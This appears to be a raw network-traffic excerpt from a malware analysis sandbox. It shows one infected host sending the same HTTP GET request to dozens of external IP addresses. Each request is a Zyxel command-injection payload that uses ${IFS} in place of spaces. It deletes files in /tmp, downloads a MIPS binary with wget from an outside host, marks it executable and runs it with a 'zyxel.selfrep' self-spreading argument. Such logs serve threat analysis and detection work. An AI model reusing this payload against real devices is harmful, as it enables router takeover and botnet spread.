                                            Feb 2, 2024 06:20:23.157777071 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            214192.168.2.155601493.71.123.110443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:23.157792091 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            215192.168.2.1554264129.15.182.149443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:23.157844067 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            216192.168.2.154605665.161.19.200443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:23.157860994 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            217192.168.2.1534166123.16.45.96443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:23.157883883 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            218192.168.2.153566244.252.22.188443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:23.157907963 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            219192.168.2.154439654.2.52.125443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:23.157933950 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            220192.168.2.1542700114.167.7.58443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:23.157954931 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            221192.168.2.1543120105.39.112.164443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:23.157989979 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            222192.168.2.1558294150.64.72.9443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:23.158011913 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            223192.168.2.15499402.172.85.160443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:23.158029079 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            224192.168.2.1549658206.46.144.179443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:23.158051968 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            225192.168.2.1535648221.217.95.57443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:23.158073902 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            226192.168.2.154293277.163.119.117443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:24.163887978 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            227192.168.2.155768663.116.194.36443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:24.163933992 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            228192.168.2.153281684.135.23.101443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:24.163958073 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            229192.168.2.153567295.108.174.174443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:24.163980961 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            230192.168.2.153515276.50.135.65443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:24.164009094 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            231192.168.2.153754234.231.1.71443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:24.164041042 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            232192.168.2.1540590137.162.104.186443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:24.164077044 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            233192.168.2.1558976153.14.196.203443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:24.164100885 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            234192.168.2.1535422123.39.178.39443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:24.164136887 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            235192.168.2.154489239.246.85.112443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:24.164163113 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            236192.168.2.154354289.154.251.244443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:24.164203882 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            237192.168.2.155965413.196.221.191443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:24.164233923 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            238192.168.2.1547488156.23.255.140443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:24.164247990 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            239192.168.2.1532830212.103.122.145443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:24.164273977 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            240192.168.2.1537222123.177.93.127443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:24.164304972 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            241192.168.2.1544490164.5.24.220443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:24.164321899 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            242192.168.2.154624285.51.211.92443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:24.164340973 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            243192.168.2.153502445.126.46.137443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:24.164382935 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            244192.168.2.15437269.71.1.84443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:24.164421082 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            245192.168.2.1555624193.150.183.10443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:24.164469957 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            246192.168.2.1538596130.123.70.128443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:24.164473057 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            247192.168.2.1540386169.240.244.14443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:24.164489985 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            248192.168.2.1557796141.76.36.7443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:24.164515972 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            249192.168.2.153618699.78.141.255443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:24.164547920 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            250192.168.2.1558506155.79.132.55443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:24.164570093 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            251192.168.2.1533188110.160.83.158443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:24.164594889 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            252192.168.2.155183269.29.197.167443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:24.164618969 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            253192.168.2.153487834.84.15.245443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:24.164638996 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            254192.168.2.1557988135.41.237.194443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:24.164673090 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            255192.168.2.1557914133.229.205.153443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:24.164695978 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            256192.168.2.1539902186.8.67.124443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:24.164726019 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            257192.168.2.1553748109.64.88.83443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:24.164751053 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            258192.168.2.1552686219.55.73.158443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:24.164777994 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            259192.168.2.1558234133.156.34.124443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:24.164793968 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            260192.168.2.155502418.156.176.1443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:24.164839983 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            261192.168.2.1560292136.120.55.223443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:24.164866924 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            262192.168.2.155874861.89.249.116443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:24.164906979 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            263192.168.2.1543662200.144.145.8443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:24.164918900 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            264192.168.2.154473263.221.240.23443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:24.164947033 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            265192.168.2.1552350212.75.107.76443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:24.164963007 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            266192.168.2.153816063.26.184.9443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:24.164980888 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            267192.168.2.1534516149.226.6.111443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:24.165004969 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            268192.168.2.153972870.253.53.207443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:24.165036917 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            269192.168.2.153327862.58.44.134443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:24.165069103 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            270192.168.2.1535146189.121.91.199443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:24.165077925 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            271192.168.2.1554746142.34.86.145443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:24.165113926 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            272192.168.2.153659614.111.127.3443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:24.165134907 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            273192.168.2.155694082.95.77.116443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:24.165160894 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            274192.168.2.154330288.228.102.99443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:24.165175915 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            275192.168.2.1532798207.191.191.4443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:24.165219069 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            276192.168.2.1559704153.175.148.39443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:24.165224075 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            277192.168.2.1536114143.57.180.164443
                                            TimestampBytes transferredDirectionData
